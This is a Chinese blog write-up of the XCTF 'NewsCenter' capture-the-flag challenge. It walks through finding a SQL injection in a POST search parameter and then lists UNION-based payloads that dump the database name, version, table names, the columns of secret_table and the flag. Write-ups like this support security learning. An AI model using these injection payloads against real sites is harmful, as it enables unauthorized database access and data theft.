攻防世界之NewsCenter

目录

审题

注入点判断

字段数判断

爆表


审题

题目就给了个搜索框,看了网站源码,也抓了包,发现search的值用的是post传参,随便搞了挺久

也只能想到SQL注入了

注入点判断

按前面搜索的操作search就是搜索数据库内的内容,内容没有就没有回显,所以用常规的and 1=1方法是判断不出来注入点的,只有让SQL语句产生错误才行,要是SQL语句的话,注入随便注入混用单引号,例如1'1'dasf'应该会报错什么的

发现页面空白,search是注入点无疑了

字段数判断

发现用order by判断不了字段,所以就用联合注入逐个尝试了,发现字段是3的时候有回显,回显的字段是2跟3

爆表

确定字段数后,利用联合搜索,爆一下当前数据库名跟数据库版本,post传参

search=1' union select 1,database(),version() -- -

接着看一下表名,构造post

search=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database() -- -

 接着看一下第二个表的字段名,构建post

search=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name =  'secret_table'  -- - 

再构建post,查看一下fl4g的字段值

search=1' union select 1,2,group_concat(fl4g) from secret_table  -- -

拿到flag 

  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值